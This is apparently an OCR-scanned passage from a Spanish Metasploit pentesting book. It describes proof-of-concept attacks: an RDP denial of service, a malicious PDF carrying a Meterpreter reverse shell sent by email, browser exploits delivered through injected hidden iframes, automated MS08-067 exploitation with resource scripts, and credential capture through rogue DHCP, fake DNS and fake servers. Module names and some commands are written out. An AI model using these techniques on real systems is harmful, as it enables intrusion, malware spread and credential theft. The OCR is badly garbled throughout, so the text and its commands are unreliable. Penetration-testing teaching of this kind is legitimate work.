en numeroeos eaveneive posi Los paylaod de tipo single, también conocidos como inline, son aulénomos y realizan una trea coneretao specifica, Por ejemplo, bind una shel, reacién de un usuario en el sistema, ejecucion ‘deur comando, tetera. Los payload de tipo siogers se encarpan de crear la conexin entre el cliente y la vietina, y _generalmente, son wilizados para descarga payloads de tipo staged, Los payload de tipo stage se descaran y son ejeculados por los de tia stagers y normalmente Son uilizados para realizar tareas complejas o con gran variedad de funcionalidades, como puede set, un meterpreter, En otras palabras los de tipo staged ullizan pequefios stagers pura gjusarse en pequefios espacios de memoria dénde realizar la explotacin, La eantidad de memoria que se Aispone para realizar la explotacién en la mayora de los casos, est imitada. Los stagers se eolocan ‘en este espacio y realizan la faneiSn necesaria para realizar la conexi6n con el resto del payload, de lipo staged. ‘Todos los exploits en Metasploit uilizan exploivinui/hanaler. Este médulo es eapaz de gestionae YY manejar cada uno de los exploits que se eneventraa en el framework, sn impact la conexin © ol tipo de arquitectura, Este médulo estédiseNado de tal forma que sabe como tratar cada tipo de Capitulo I El arte deta intrusién ia payload porque cu su configuraviOn se le doe que debe espernr Cuando el auditor se ecuenta ‘on un médulo cargado, previo uso del eomando we, llega in momento en el que we debe eleie el ad, co a instaccién set PAYLOAD ind arpetreere ‘ Dose mT Tt Fig3.0: Cae dl epi y olga del ma Una vez cargado el mbdulo, si se ejecuta show opvions se mnuestran las variables para configurar el exploit En este ejemplo, se configura la variable RHOST para indiar cuales la miquina objetivo, ‘Ademts, se debe indict en la variable PAYLOAD cual de ells se quiere ejecular. Una vez indicade , el payfoad si se vuelve a ejeeutar el comando show options se puede observar como aparecen, ademas de las variables de configuracién de exploit, las variables de configuracién del payload. ice cet Sig ened Serio 0 ims eer Fi: Cg et ppl canine Es muy interesante entender distints conceptas en el comportamieto de os payload en funcidn ei son inversos, reverse, o directs, bind. En la prueba de eonceplo se ha ullzado un payload ‘eterpeter de conexién inversa, por lo que se debe configuraralcéigo del payload dénde se debeMetasploit para Pentesters cconectar mediante fa variable LHOST, es decir, a direccia IP del alacanteo de un servidor que ‘eco fs conexiones que se encuentre bajo el contol del stacunte Por oto Indo, se pod haber wilzado un payload eon conexin directa, bind. En ese caso, en vee de apatecer la variable LHOST en la configuracin del payload, apareceta la variable RHOST, ‘que debe seria dieccidn 1P de ka maquina a la que se quiere veceder. Hay que recor que en ut payload de conexion directa, es ef autor quién se conecta a ki vitima, Tras el lanzamiento del exploit, se dea en un puerto a la escacha, por ejemplo, una shel, y es entonces el auditor quign se ‘eonect.a ese puerto dinde espera la shell remot, i305: Dell ea coe dos pea El comando check petmite verificar si el equipo remolo es vulnerable al médulo cargado, por esto, antes Ue lanza el exploit se puede uilizar est comando para veriica la vulnerabilidad, Una vez veificada se lanza el comando exploit, y se obtiene la sesia remota, en est caso de meterpreter. Shilo mt» et Fig 306 Bxploocia de mii Wado XP SPD apa PoC: Denegacién de servicio y las pérdidas exa prueba de conepto no se reali un proceso de inusin, per ie comproba I sogrdad de los servicios de los que pede eisponer una empresa, cayas cals pueden provocr pias & és, y sade forma pivadaopliea,Enesteemplo sila a vulneslided §S1220 lagu se puede obtener mayor infomacin ena siguiente URL: hupsechet mires com/es-es/ Capitulo IH Bl arte de fa intrusion re securitybulletin’ns 2-020, La miquina objetivo en el siguiente eacenatio seri un Windows 7 con ‘PI de 64 bts. También son posbles targets ls siguientes versiones els sistemas operatives XP, 2003, 2008 62008 R2. En primer lugar, la vietima debe disponer de una configuracion cone eta desu servicio de esertorio remoto, Como se puede visualizar en ls imagen existen 3 opciones en Windows 7, igicamente, sino se permilen conexiones nose pod ealizat la denegacin de servicio, y por ot fado, si seco lata «que slo se permitan las conexiones desde equipos que ejecuten esertrio remolo con sutentcacion 1 nivel dered tampoco. Por lo que sila vietima dispone de la configuracin permitir conexiones aque eecuten cuslauier versin de eseitori remoto, puede ser vulnecable si wo ha aetuaizada eon lw coneccion de ts vulnerbilidad, Nepiontetny gation sn tap tacrmennscane OCuanecnacSocomec pected Strstcthaucnressntnaas otra) ig: Conigaracin oro eat en Winks 7 Para ablener el médulo se puede descargar ditectamente en la siguiente web winrmerasploit combnodles(wiliaryldoshvindows/rdp/ms!2_020_maxchannelidsteniendo en eventa que ¢s ib iédlo de tipo auitiary. Mace te tnt tse Sieudnnna ry stots i iat iH > rasan ac it tes (aan ys scat) omer eng maga icon 1 hm - mat ey es Fig: Dengan servicio del eitrawenolo de wn iin Wd 7.a Metapoi parn Pentex Una vez se dispone del médato en el jramework se secede a él y se configura, de manera secila, equipo remota al que se quiere denegar el se-vcio, Si todo va bien, se obtendra un mensaje que enuncia seems down. Sila mfquina a auditardispusiera de un servicio de escritario remote en otro poerto que no seael de por defect, se puede ulizarl variable RPORT para inicar cual esl puerto ‘que se est utiliza, Parece que todo ha funcionado correctamente y que la méguina ha eaido, En funcién de la ‘onfiguraeién de la eiguina ésta se reiniciaré tras realizar un volcado de memorie, g¥ si tas a levantarse fe vuelve a realizar una denegacion de servicio? ,Y si la maquina no esta configotada para reinciase y queda Tera de servicio hasta su inicio manual? Estas pregunin so bastante lige, y areal es que sla maquina es vulnerable Ia empres ene un gran prblenss, i cual deberia ser solucionado con la aplieacibn del parche para evita este agujero Fig: Pals sel de Winds 7s degli de vv, 4, Intrusion con interacei6n Cen side atack 0 ataques del lado del clione, son atagues que permiten al atacante tome el na victima expfotando una vulnerbildad de una aplcacién que es ejecutada cuenles, cada ver son mis complojs y provacan que por el usuario, Este tip de alaques son nw ia vietima no sepa realmente lo que esté haciendo con su miquina ‘éenica consste en crear, ya sea un fichero, un servicio, © una aplicacién, confines mi con el objetivo de obtener acceso la méquina de Ia victima, ya sea por red local o por Intemet. Capitulo IL Bl arte de ta intrusién ‘eraplt ayuda meta eee ind sagesy ene parade dos eld hora de pensar enn alague de este tipo ‘A continuacién se proponer dstintos escenarios y pruebas de conseplo con los que el tector ei similar la tcnieay los coneeptos de manera sencilla y répida 4 PoC: Los archivos adjuntos pueden ser muy peligrosos 4 nea pre de concept sella la posibildad de crear acs rics eon el fn de gu ts vctimas fo eecuten mediante c uso de una apicacién vuneable. En la pra se olin um ‘ulnersbildad de fa famosa herranenta Adobe Reader la cuales vulnerable en ss versiones 8 9.x de product, 4 En este ejemplo se ha decidido explotar esta vulnerailided debide a que afecta los archivos POPE !muylizados en ntemet, ya un de is heranients que disponen la mayor de os usaros pa visvalizar este tipo de archivos. Existen ofr vulneabilidades de et tipo, comiinmente conocidaa ‘como FileFormat, en el que se pueden exear documentos ofimitices de aplicaciones muy utiizadad ome Word oxce,o archivos de ists de repos de Times, cays ines Son malcioss. 4 ‘Una de las vas de istriouein de este atague sera, por ejemplo enelcontexto de una gran empresed ef correo eletrénica. Mediante ia tilizacién de un servidor de ccreo electrnio se podria hacey liegar este tipo de archivos a toda una onganizacién y con lie probebildad habria usuarios que éjecutarian estos archivos. Otra de ls vas, seria colgar ests archives en foros, blogs, sitios web bupel conto del acne, Como sempre, do depended a inagnacin del teat de lncalidad de sn ingenievin soit ' El escenario que se propone en esta prueba de concepto es que un atacante prepare un documenta PDF en el cual se inyecta un payload de tipo Meterprete. Este aichivo alilizara una plait, cs. decir, un documento PDF real que sere que se visuaizaré cuando la victima lo ejecute. Adem cuando la vitima lo ejeeue 8 su eplcacin Adobe Reader es vulnerable se ejecutari ol payload. El fcante realizar ia dstribucién mediante et uso del correo electrnica, como archivo advunin, El! atacante deberd carpet melo exploitimlifhander para recog ls dstinasconexiones que oblengan por las expttacionesrealizadas con éxito mediante el archivo PDF malicioso, El exploit se encuentra alojado en exploizhvindowsfteformatladobe_pd- embedded eve en ta ruta relativa a msfeonsole. Si se miran ls fargets, se encuenta que silo funciona para Bindows XP S5P3 versién ingles, Sie abeivo son vieinas on sistemas opertvas en otro idioms, el alae po defect no funciona, Exste una fi solucin y es modifica el crit en Ruby y aad fo necesario para que el expt funcione en sistemas operative con ia versiGn espafola, EI exploit se eneverira en la ruta. /peneatlexplltsramewerk3fmodlesfesplotshvindows! ileformatiadobe_ pf embedded eve rs 6 optlaptineiaspoitineptimaduleslexplous /windows? ‘ileformatiadobe_pdf embedded _exerb. Pare modiicar el exploit + que funcione en Windows XP ‘SP3 en espaol se debe localizarl siguiente linea ee ciigo= etl pora Paneer es = ( "Desktop", "My documents", “Socuments ‘Simplemente se deben aad los siguienles nombres a la anterior linea ddiza = | "Desktop", “My Documents", “Documents”, “Bacriterio’, “Mie Documentos”, “oocumentos™ | i vez modificado el sero’ se debe arrancar myfconsole y se pad ullzar el nuevo médulo ‘dficado, nla sigviente tabla se pueden visulizar algunos parmeteos iteresanes &configurar leas la carga del médulo adobe_ pdf embedded exe. Pardmetro Valor [Nombre de jecutable del payload, sino se indica se aulogenera uno. ‘Se indica ef nombre que recibcl el PDF malicioso, Se indica ls ruta donde se encuentra el PDF real que se ullaaré pars ‘mostrar a viet “Mensaje que visualizaré fe vietna, el cual si gjecuta se realizar ta LAUNCH MESSAGE | sh opine fre epics testes, ietenat uke iene oo, TO ie of pad ae frre etgar mers jrstaetep eta gt Lat esse ver te eer etn ear teh the Bot show tl 7 Fig3.10 Coogan pt a creacin del POF nals ‘Ades, hay que contigurar el parimetro PAYLOAD, en este ejemplo se ha utilizado set PAYLOAD windows/neterpreterdreverse_tcp.Indicando a qué IPs Lene que eonectar el payload. Una vee configurado se ejecuta el comando exploit y se genera el fichero PDF malicioso. Se puede empezar In distibucién mediante el corre electrinico, pero a Ja vez se debe estar preparado para recibir ls conexiones osesionesremotas. Pru ello se carga en mafconsole el dul exploit’ ‘handler. Bste manejador sive para que cuando la vietima ejecute el archivo y el payload realice |i concn inversa al tacante, ese médulo gestionaré este proceso dando acceso al alacant a a sméquing remota, Capitulo I Et arte de ta imran ew Este médulo se configura de manera seneills, simplemente se debe indicat que tipo de payload se ‘espera y cuales la direcciéa IP local, es decir, ala que el payload se va a conecer Fisk oto iondtery > aed Pini winionrasterpretr/ revere ta] fnv.ca <> nantous/acterpreter/reverse to fst epiottoaniter) > set List 1s2-168.<2 ig: Coie del manor de Hep ina vee que las posibles vctimas han abierto el comeo, han ejeculad el archive PDF y dispnnen de ‘wa versin de la aplicacién vulnerable se muestra un warning al usutio, s porello que el mensaje «que se introduzea en el parimetro LAUNCH_MESSAGE es imporante que sea celle, un aque de ingeniesia socal Ft usuario pula sobre open y se estar ejocutando el payload en la miéqulne de |e ction, Con Giza] igh I jeu dl PF por pre dein, Lacrplotacién devuetve una consola de Meterprelery el usuario o victima puede seguir visualizando 1 PDR, el cual muestra el contenido de fa plantlla utiliza para exer el POF malicioso, sk eipaitihadter) > explo I) started reverse nandler en 382.168 ist starting the poylead tendler f Siete > 192.168.0.61: 2321) at 2012-06-27 02.0921 Jctecoreter > tackground fst eptnt(handter) > sessions 1 nforaton connection seterpretersuayven2 isn i319: Obcorin de ssn ner de Meet. QuickTime y sus conexiones por Rubén Santamarta A Finaes del ao 2010, sai una de las vineabildads més inprates ens mos i lo que sire a Apple y sus productos. Rubén Saamana, ivestigador expl desa CL Y my conocido como reversemode, sacs a la luz pblica esta vulnerabilidad y sv correspondiente exploit el esl permitia aun atacane eecutar céigoarbitravi en las versiones XP de Windows con SPS. Esa vulnerailided se encontraba escondide en QuickTime Player y levaba 9 aos abi, La vulnerbitidad se debe & un parimetro denominado _Marshaled pUnk en el visor de QuickTime ‘we se utiza parm cargar elements desde la ventana Segin comentaba Rulbén Seniamarts, cuando Dublice su exploiten el articulo p:livwnreversemede.comindexphp?option=com.content&ask viewibidl=694t lei =), parece que alguien se olvidé de limpiar esta luncionalidad i cia despuds de que Rubén lberase este Olay que afetaba a fas stimas versiones de QuickTime, Por aque entonces ia 7.6.6 ln 7.6.7, ls desarrolladares de Metasploit liber Jramework ron un mélo para el Ft escenario de In prucha de concepto es el siguiente: existe un atacante, con una distribucidn BackTrack que quedari al espera de que is vietmas, que ejecaten una versin de QuickTine 7.0.2 «inferior, se conecten aun recurso propuesto por el alacante. ;Cémo se logra que las victims se jconecten a fs maquina dl alacant? Esta pregunta tiene muchas respuesta, y normalmentcse puede ‘contest con la palabra imaginacién. No existe un método inca, y siempre cada metodo puede Ser ejeutado con toques inteesantes de creatividad ¢ imaginacidn, Por ejemplo, el atacante puede haber distribuido une gran cantidad de links por fors, blogs, rees sociales, correo electrénicos, etter que reiijan a una vctima ala drecci6n IP y al recurso malicoso de atacante En muchas ‘easiones, Ia vilima no sera vulnerable al exploit, ya sea porque no clspone de est aplicacion, 0 Porque la apicacin est parcheada, Otro método interesante es intrceptar ef trfico de las victimes, encontrndose en la red local del aac yredirigina facia el recurso malicioso. Quizé uno de los métodos mis interesanes,y qe % muy ufiizado en el mundo real para distribuir malware, es disponer de una serie de paginas hnackeadas a las que se eoloca un iframe transparente que apunta hacia el recurso malicioso, En este caso cuando fa vctima entra a I pgina web rel, su navegndor carge el frame, el cual apunta ‘nec el recurso malicioso y se puede leva a cabo la explotcién, sin mas interaceién por parte de fa vietima que el simple acceso a un sitio web. teeter JF) Seren ener soos tor pattern erste. ininerhracerapte quiet matted pk ining ot” grat sole tlaae 1.4 Fig: Cag del lo mare jak psa Aple Qvc ine Ta ‘has buscar marshaled en el framework: se carga el médulo y se prepara el entorno para que cuando of elinterealice la peticion y ejecute la aplicacién vulnerable, cen side attack, e exploit realice e tuabajoy devuelva el control de la méquina remota, Capitulo I El arte de fa intrusién a 1 pepe etetine Mayer 7.6.85 sl 7.6.7 on Weds F579 toes un snap) » set SEES 2.82 heist et est irtn vetting wade)» aot thm ses [i esos eltton sarap > set PL w ‘La coafiguracién es sencilla, se deben asignar valores alas variables 0 los pardmettos siguienes:! Parimetrn Z SRVHOST | tx direccibn IP donde se implementa ef reaurs0 malicioso 0 explo | Se debe indica el puerto que quedaréa la escul, para simular un recurso ame ‘web es importante aignaro en el 80 Recurso al que se quiere acceder. En ef eemplo se inca Guegos, pero P bastaria con / URIPATHL [PAYLOAD Se debe indicar el payload a ejecuar en la miquina voinerable Tia 302: Corte dl mao mars pak Is iyo hasan onan ces 2) non le ee 18.7 rtd snk ‘sei stage Dassen a nett) st terete esse tere (0 GRA > 2.8.6.8: Penn 1 x jsut > a8 oes Utter 1 Be sere proceed 436) Fig 16: Epc ler com el mc mre uk.Metasploit para Pentesters ‘Pueden llegar peticiones de muchas victimes, en funcién del método de distribucion que set tsiad, cule mis pains legen myer pombe Sas ens eo ae ued ley qe cans dese ese ruleabiied fsibiata po eae ns ra Oy or oie oe cals Ge paces le La Ieper every ented pos que dips sprees no atladaay os aoa ny ‘on pies alae ds ids Oa Dark Shadows, el mundo oscuro y real Laindsia del matey lade online sige siendo dl dehy, granola de esa ind, Un indcaor de ete eho es el nimeo de copa nies de malware que te ha pemte oy g ilo aos, Ea pines lg hay qu ecorar que el spam, en eget ol hmevinn pon sien fe via de distin leg, que el malware sigue erecende qc ls Moe O8 % sete 2 auge y que fs disposivs mévies von un objetivo ya atcado,Adeiniy, ep fort imporantes se han dscubiero vuherabiliades cies y el nim de agueros de epeicad «escubieros pr alo sigue siendo um nero muy ato. Sion nite ene OTN ie occ tem shane 28K om ig. Kitdeexpitn Blk Hole Capitulo Hl. Bt are de la inrasin Una de las vias ms importantes para a distribucién de matware sot los sitios web, utlzando un kit de explotacin, como puede ser Black Hole, Eleanore o Phoenix Exploit. Esto kit de expltacisn Aisponen de gran cantidad de exploits pablicosy, si se page lo suficieleen el mercado umelrgrnl de explotsprivados. Dichos exploits privados proporcionaa al slacate una venta sobre muchos de os usuarios que caecin en sus redes con fines maliciosos, isponen de paneles que aportanfecilidad de uso y gran informscién. Muchos de ellos taje de éxito, ‘Ademas ltecenestadisticas de los navegadores explotados, ls pues dels vietmnas, po exploits que mis aierto han tendo, el sistema aperaivo mis explosado, eleétern. El proceso noes trivial pero una vexestuiad no es de gran compljidul. La ides e que el atacane selecciona las vctimas a través de un programa automético que bisa patrones en los buscadores como Google o Bing. Una vez se obtene la lista de sitios que son vulnerables, e realzan ataques SQL Injection a todos ellos, cuyasinyecciones est preparadas para introduc ego malicisy en la pigina web, 1 céigo malicioso que se introduce carga el contenido de ne direecibn que ser dénde se encuentre el ki de explotcién, De este modo, cuando un vsitante navegue por el sitio web vulnerado sera alacado con un exploit que tratark de ejecutar un maiware en su maquina, ‘Como ejemplo de un hecho real se muestra #continuaci6n uno de los vaioswtaquessufridos por fa ‘web de Apple. Tambin hey que decir que Apple ha trabajado siempre de manera rpida para Kinpiar toda referencia sitios web maliciosos. Bn la imagen se puede visualizar como se inyeets un ume ‘que reerenciabaal sitio web malicioso ene interior del sitio web de Apple. Bl sii al que se releian cra al dominio nemohuildin.ru, pro a victima podria no detect ninguna accién extra ya que si frame fuese wanspareate no se visualzaria nada extra, Sraota aera catnSonrsco veel ieaeatoensesctnecntecnmmeerane ig. Bunda de aoe ales qu abaya are PoC: La técnica Browser Autopwn En la siguiente prueba de conceto se utilizar el médlo Brower ame osibldad de fanz eps de acuerdo ala version dl navegador quel vicina ex ula [Elescenatio dispone de 2 maquinas, una serkel alacante con un equipo Windows XP-SP3 quedlispone «de un servidor WAMP el eval ofrecer una pégina web maliciosa,simulandon sito hackeado, pigina web dispondet de un frame transparent que referencia a una maquins donde se encuetie el ‘médulo browser_autopynesperando par lanza los exploits. Bn el escenario el malo se encontrar en un Merasploit en la misma miquina del WAMP, es decir, en la miquina del atacanle. Por olr0 lado, se dispoue de una miquina que ser lade la victim, coriendo un Windows XP SP3, en Iaa 1 re nan veBtEén hacia a Web haceaday que be sido mca con I inyez in (el diame malcioso se vuinereda por esta téica, Une Yer que se oblenge el contol remote de ba mains de ta vitima se realizar la disbucion de maton ne ne Prueba de concepto se He arkConme. La dstibacdnyereci de malware serene root consol de cepa ter Const modo se puede obtener ran cai de miquien teen pend Metasploit para Pentesters Ser wrt de una bone simplemente por navegar pr sites hackeadon J Amdahina del socatedsponede tndiecién P9218, enliascaoac sto web malicisn iil ete La méquina de a viinadspone dela dcceg IF ae ra ene pruebs de concepo, sion ltd w Servidor WAMP ee méquina de atcate y enn vata vamp wa pc tou sto web qu simula a pigin real que se enconaia chen pina Tet lon con dst teramientss, por jenple Tignes ay que dejar el milo, {tipo aula, browser_aopsm prepared pare web as conexiones y que pueda tnnzae los exploits, La configurae le visualizar en la siguiente table, Valor nP para ls conexiones inverse de os pa | Skvrort | Se debe incicar Duero por el que escuchar el médulo 8080 es una buona ncn | DUE Te ees 3.19: Coniguncin del no bronzer ep [an vez ae se dspone de mio ata espera de recibir conexones ene ‘uerlo 8080, se debe sre ate ne oe eb mains debe cargnrun tame transpareie qe tfoeree camp i 9 nde se encuente el médun browser enfopon, Pra sivas inyeeciéa ve eddigo, eamo Taian" NAME Pal 8 eat so web ys coloca el jrame eto se pee ee wren la imagen, cess ig 0: nysecin defame ono clgn dea pga wo cr alt ated espe aque a vctina se conc &lapgina web mation ¥ tas cargar su ‘onteid. lamin cargarl fame qu realizar laption ale deen up 192 a 808 Capitulo HL El arte de la intrusién ED e nse realizaria a ur dominio piblico adquivido pag Para hacer tse siete ion ac che tm grr de cil ye ic Gel archivo haste de fa victima para que cuando se intreduzca la direccién real se cargu rare heen 10 se tlevaria a cabo asi, lu web que sive el alacant, Se entiende que enn ataque rel igh 2 Navan do vein we ches F322: Bowser Aopen lead exo, Us finoainano de tye ers my ease mbit hoa taco ie cee ye est med lao tl comands Se tren nets ou rac eae ‘aplicaciones en Ia mquina remota, ig 3.23: Date de malas,i Metall pora Peeters Una yz ligase road, Darke ane iad, Darton const col aca once, generic de nb de DriConme a eee nest cs ok Gk mel ik ont an Hanne apn ew oe ino por seme nh ua olsen Ps aaa Aispone de una diseccién IP estitica también podria usala. “nines Ange siaaecante Fig 2: Eltoyan secon poe densi 5. Automatizando las 6rdenes Ts ver la parte de inns 0 exp I si 0 explain de sistemas, en In que si se consigue el éxito a stein ste 2g vba ya pea: de ev pon Sop de ins, Anevionent, ha estado camo I gia de nmin ean de evi elg ue pede ever sate ep perelg que ede sr auaiada, ya Que ‘gencralmente, e! proceso tiene mas aspectos de procedimental que de artistica , nomaizaion as eas elitr en Metab es n proceso gue pseu al auiora init lempos: Como seh escionoaniromente nun este inion ens an pate de procedinient, el eva en condiciones noms esenpre igual, y una parte menor que depend a experiencia o percia del auditor, a parte mas attic, se iis emia nora lab a tel air eons el famevork. Ents, ie pds oma oy ifn? Eo es idea dea mou sop cee sea. ane Los resource grips soa ta bie cice srt soa tas por el framework cone enpates ERB l pei lacjeucion de loques de instruciones en Ruy, desde los cuales se pod interactuar con la API de Metasploit, REX. Existen algunas re que vienen por det Fe cae lzias re que vine por detonate ta fens Con ses ue ven por dete con oF dit on el raenort pd eit maya del ato se explo de nrmain dt entre sada & continence tea ue vienen por defecio y que es realmente interesante ‘he ene Pr deel y que ele nese yi al hor de deeb servis y de Capitulo I Bb arte deta intrusion Ejemplo: Descubrimiento basico neste pasado sb en en dtale en In dscicibn dl serio ave discovery ave se pode Enoontar carla petsveplotsrumeworkscrpsesource. fe srp! sive para conseguir Sheer intrmacin sobre aguas y servicios disponibles lindo nap y ors moles Sontlares algunos de fos iis anfvinmente en et bo, pra proocaos sm, ian, ep, lp _fip, evoétera. ‘A contasacio, mediante el wo del comand cat [mores va a anaizar el sern. Hay {jue ener en cucta que puede personaliaen fei de as neces eto, implement, el archivo roca medians agin elitr de texts. in de una variable denominada ports Lo primero que se puede abservr en la inmagen es la deck «qu contiene todos los puetos qe setinanalizados en busca de servicios. El auditor puede modifeat lrango,ampliandou disminuyendo el nimero. Un concepto muy interesante es el datas el cu floacena las variables que se eonfiguran en msfconsote, por ejempla RHOSTS, (HOST, RPORT, tier Pata interactuse desde el interior del script con estas variables del fiamework se lliza Ia sintaxis {fomevork daiastore{‘'). En el script se puede observar como s& hacen ‘comparaciones mediante el uso de condicionales if para poder verificar que antes de andar el script se eonfigoraron as variables, nel caso de a variable NMAPOPTS, define las opciones con las que se ejeoutar nmap sino ests declatada dicha variable en el dalastoe se declararé en el script coe uns parémettos por defecto, lal y como se puede ver en fa imagen. (ange 28 Tor Far TE (emer satartarl Wt518"] = lt) ine usgothve eset OSS gblly «.extig") lt (rammor. aatestre MOIS) = ll "toys = rant astra OPTS") etoltssttus tsps Se 0 Tig 25 Fn digo el eri Dale dover Para la ejecucibn de médlos, tas la configuracign de variables, incluso para configura variables desde el intetiot del seriprsedispone dela sentencia run_single, Para asignarun valor aura variable ‘el framework, es decir no local al serip, como por ejemplo RHOSTS se utiliza run_single( ‘chariable> "). Para ejecutar una sentencia en el framework desde el script sera similar & To anterior run single(“db_nmap ~» -n Hfrmapopts} Miframeworkdatasiore| RHOSTS IF"). Las vaables se especifiean mediante el uso de #{ variable).ee Metaszlott para Pemesters Ts TT Prin UneWafae; db ape) IP verbose = 3) We("Usog nap with the foltoving aptiont: -¥

see mois ab ae Se isis tana lst > cesses bn scones. {1} Poessng pt fraeerainty/scrigtsreowcrost saver. ce tor tn directive, | fnnnag Sy 9Frammorkvasfzscripts/erorceybasic discovery. em hy Coe [See bytes) i} arabese conection Asn't established lot > ig3.2: esi desis dcoveric cme por consis Jon Capitulo IN. Bl arte de la intrusién nan ‘ ‘Uno de fos errores mis eomunes ela no configuracion de las vatiabes en el framework antes 7 lanzar el script, yu que puede que éste las require previamente configuradss, por otro lad, ott d los erorescomunes es in no conexin a la base de datos cuando el erp lo require iL? ited poten RCT TT lst > ressore tate discovery 1 resource tase discovery ce Raby Cte C8075 bytes) orci prtsarers han see * [st Aasory ands runing e bctgrund Jeb el they sng tap withthe foleving options: > matespeeter.re fcho set PAYLOAD windovs/neterpreter/reverae op >> weterpreter re techo set IMOST 192.188-0.100 >> neterpreter.fe cho at ExitOnsossion false >> neterpreter fe ono exploit -} =z >> meterpreter.se Para lanzar este scrip existen distitas maneras, como por ejemplo, en na lies de comandos jecutar myjoonsole ~r meterpreerre, 0 desde une sesion de mseonsole mediante el comando resource meterpretenre ire ejemplo interesante es la automatizzién de ta explotacion de una méquina, por ejemplo, ‘mediante la explotacién de MSO8-067, ‘echo une exploit/windowe/nb/ms08_067_natapt >> exploitvetapl-re[echo S0t PAYLOAD windows/eterp ‘eho set mH03t 192.168,0-110 55 Metasploit para Pentesters reter/tevacee_ top >> exploitnetaps.co exploitnetani re Capitulo I. Bt arte deta inrasn ia To Deseripciin Méduto ausitiary | Sh Sn ist tse tee tug 3 exon Zo echo explolt -} ~2 >> exploitNetapi.re Sat Me rd stk ad LI caren cence servereapurcinnp | Permits, conte “_ [BST > Pescara caprorMMeraeT re = ata een fret |sreerse ty resource (err Hy eter our (otshraanartacancrpts/tecn cee err ep treat fins nia nteg [siete eprom Irscuee Vopttrecocayst/s st roag ae tacgrund J +) street svaras tse fs ence asa ety fs) Stet saret minus we a +! Atty te trae the etait = Sy stapes Aye) ena sp 6 eerie een Taps (2 ae ed 2.8 iaycrgtyresercfepelttapce for i erecta, tap rl> se copes ah/ast “reno et ae ins freee sep sas Srp reaeuceeplal ep)» st ES 12880 98 e04ro/esa sero cescrcefepls tg cl set ST 12.36.0098 ntsreeucereptatnetiphe)> eelt =} 2 6) ely eeteting te tage ‘nos 1 Service ah 3 tape i390; niin de wa rere sre MSNONT 6. Servidores Rogue ‘Metasploit dispone de unos mésulos levantar e tipo auliny my interesante que permiten al auditor sev n eos deine ar inne oe oa zeman Eten fees po de ava a cap decd a Seen deca ate eee el eagfo en lo maguna reno Lo eagion cen steae a 4 direcciones IP dénde en un ecaerd i a entramado de servicies, io mediante jonamientos ‘puerto conereto espera el servicio malcioso, hasta un complejo que aparentementerealizan lo que deberian para terminar con la explotacién de la maquina de a viet, {La ruta donde se aja en et puede encontrar un directorio capture dénde se almacenan médulos cu ‘aplura de eredencials y, ols element informacié sobre los framework este tipo de médulos es ausiiaryserver. nesta eula se 90 obtv pica es od es ear his A canine médulos serverfcupture, oD Médulo ausitiary server/capturfamb serverfcepuurefip Deseripcién Fermiteconfigurar un servidor para protocolo SMB con el que se pueden | oblener hashes de tipo NTLM Penmite configura un servidor FTP que presente un login pare texoger credenciales serverieapture/ 7 Permiteconfiguor un servicio POPS falso pra caplura creenciales per serverieapiure/| Permite eonfiguar wn servicio SMTP pax caplurar erences de | simp utentcaci6n server Pee ni i a Sa a [a ERAT SA wee SRT Ra taras eon st ac states ee ets tsi)» 5 Rela ea cen cotta ey sree started Sinticy nhl > (9) 2012-46-26 72:08:10 ore Itc sponse Cred fon Io it i 3077 lee fet es: lavas oiestted Ur cunt ouLusceisbles lansezers thet CULLEN ig. Capt de hake con auntie Exist la posibilidad de deseargarse més exploits que proporcionar fineionalidados simiares eon ‘otros servicias. Bs muy interesante dispones a mano de este tipo de Herramientas Las oltas herramientas interesanles son las auxliaryserver donde se dispone de distintas Tuncionalidades que, ya sea en solitaioo unidas, pueden provocar gran (error en lard, PoC: Rogue DHCP, Fake DNS y Applet de Java Enel iuene ejemplo se va a realizar una phn de coacepto cn ailian/ervertcy, con el «ques configura un Rogue DICE, clinerverfakdhs, can el qe configu’ un DNS un tht epi yexlitnalrowserfna signe pplt con el ese eliza Ia explotaci de tami def ving El escenario esti compuesto por una eed, que poss ser una red wireless 0 una red eoxporliva cableada,dnde el alaanteconfgurark un rogue DHCP con el que se buscari ue Ios cietes obtengan una dieccién Pde un rngo eanereo, una drecién IP den servi DNS controlade por el atacaney una drctin de puerta de enlace, qu ambien poi srl direc IP del aac por lo que se para monitoriza el trio pare obtenes cookies oersencils.az _Mecpli pare Peeters Adkins conga un sericove nde lia a cones s nad tap ja on incon. Ee evi se frend por am pgs wth aoa we poral eave y qe relent rei al sevicoweh doesnt ate Palcane Ut gia sexes onan seo Apc te ea pene fst a gar pti ve mesa a pg dl al hte que pen dese sete URL des ententa congas leit dl ape. Chonda st oar tine eae Sei el eee at at pt dee rasa {ar configuracion dei Rogue DHCP es bastante sencilla. se carga el médule alianycerenidiep y ‘ong algunos parémelrs coma se puede visualizar en la siguiente tabla co om | TAR | 12.00.10 7 La direceién IP donde: or ej me nde se eniienta ot DNS, por soni, min [psssmevan awe Basset Gacuaseaa TT fasiassasso pee ~The arpa poe SEES meonitoriza teifico, 192.168.0.61 [SRO fs inn ene aan tous DUCE TRA 7 "a ie SSL ae ae ep tare se rm Seton eed epi ooo eins acto one 2 Bixee Fe 2 SRG Sie 2 Raweroe, la SRST ae le Seton pms tein = 2 gin eres | oe ERS oe 5 Rosy | samosr yes The TP of the ONC server sce >t merece ee et eat ig 32: Conguaein Rogue INGP Capito I.E ert de ainsi ca Posla ser interesante agotar ios direeciones IP disponibles en e poo! del DC? original que existe cen a misma red, sexistiesealguno, Llegado este punto, ls clientes que seconecten a lared recibirén ieeciones IP ctorgadas por el servidor DHCP fats, adem de lo ms interesante, In dreccién IP el servidor DNS y dela puerta de enlace que se quiere Fs ef momento de coufiguar el servidor DNS flso, para elo se cage el médulo aliaryseriver/ Jaledis, El funcionaniento de fakes es sencilo, con la variable COMAINBYPASS se configura ‘na lista de donsinios para los que las resoluciones no serinfalseaas, SRVHOST es la variable «inde se configura la direccién IP inde se monta el servidor DNS flso, fa del alacante en este 380, Tras lnnzar el milo, en el ejemplo, eusmlo la vetima pide resolver cualquier nombre de dominio, excepto Google porque asi est configurado, se resolver con la direc IP del atacante nde espera el servidor Apache. blr seen) shaw eptena eatin (matures fove arn sertog fered oeserpor Sie is of emia mane wat to Pty reste | Sie Le ame te lt an tar (tbo) > at sanest a jest sarin = Ft butiny este ectce cnptetes os os server esate [slo free started Tigh Coligenite de tec ‘Una de fas victims la cual obtuve las diecciones IP por el DEICP flso,realiza na peticién a win apple.com, El servior NS falsoresuelve esta eticién devolviendo la direccién FP de Ja méquina el staante, 192,168,061. La maquina dela vietima, realiza la paicié al alacante al puerto 80, nde se eneuentra um archivo inde. con cl 